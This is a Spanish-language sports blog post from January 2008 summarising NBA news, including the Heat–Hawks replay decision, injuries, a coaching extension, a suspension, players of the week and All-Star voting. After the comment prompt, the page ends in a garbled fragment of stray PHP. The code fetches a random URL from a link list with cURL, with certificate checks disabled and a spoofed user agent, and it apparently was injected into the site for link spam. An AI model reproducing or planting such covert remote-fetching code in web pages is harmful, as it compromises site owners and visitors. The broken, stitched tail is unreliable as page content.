Noticias (15/01/2008)

15 de January de 2008 por Jabho

Una de las noticias mas importantes de la semana, por poco habitual, es la decisión de repetir los últimos 51,9 segundos del partido entre Heat y Hawks disputado en Atlanta el 19 de diciembre. El partido acabó con victoria de los Hawks en la prórroga por 117-111, pero en ese momento ganaban 114-111 y se produjo una personal de Shaq. La personal, según la mesa, era la sexta de O´Neal y, por tanto, conllevaba su descalificación. El error fue que durante el partido una personal de Haslem se le apuntó a O´Neal, por lo que la personal del pívot era tan sólo la 5ª y por tanto podía seguir en el partido. Tras las justficadas protestas de Miami, el comisionado les ha dado la razón y se repetirá el final del partido, algo que no pasaba desde 1982.

Lesiones

La página oficial de los Miami Heat anunció la retirada de Alonzo Mourning por su lesión de rodilla. Poco después la noticia ha sido retirada de la página web y desmentida. Habrá que esperar acontecimientos para saber si Zo vuelve a las canchas o no.

Por otra parte desde el viernes 11 de enero Nene ha dejado de participar en los entrenamientos y partidos con los Nuggets. Su ausencia es indefinida en el tiempo y en los motivos, ya que de momento sólo se sabe que tiene algún problema de salud aunque no se concreta cuál. Circulan diversos rumores respecto a la enfermedad que padece Nene, pero de momento no hay nada oficial.

El pívot de los Lakers Andrew Bynum se lesionó el pasado 13 de enero en su rodilla. Al día siguiente se confirmó que el alcance de la lesión no era muy grave, pero sí le obligará a estar 8 semanas sin jugar. Es una baja importante habida cuenta la buena temporada personal y de su equipo.

Movimientos

Pocos movimientos destacables en la última semana más allá del ir y venir de jugadores a la liga de desarrollo. Cleveland Cavaliers ha extendido el contrato de su entrenador, Mike Brown. Brown es el entrenador que presenta mejor balance de victorias en la historia de la franquicia y llevó al equipo a las finales del año pasado.

Premios

Empezamos con una sanción: David Harrison fue sancionado el 11 de enero durante 5 partidos por incumplimiento del programa antidroga.

Ayer fueron nombrados Chris Bosh y Kobe Bryant jugadores de la semana. Bosh llevó a Toronto a un balance de 3-0 esta semana promediando 33 puntos, 8.7 rebotes y 2 tapones. El balance de Kobe con los Lakers esta semana ha sido de 4-0 con promedios de 29.5 puntos, 4.5 rebotes, 6 asistencias y 3.5 robos.

Para acabar, el 10 de enero se publicó el 4º recuento de votos para el All Star Game de New Orleans. Garnett, James y Wade en la Conferencia Este y Kobe, Ming y Duncan en la conferencia Oeste encabezan las votaciones. El 24 de enero se hará el recuento definitivo del que saldrán los quintetos titulares.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>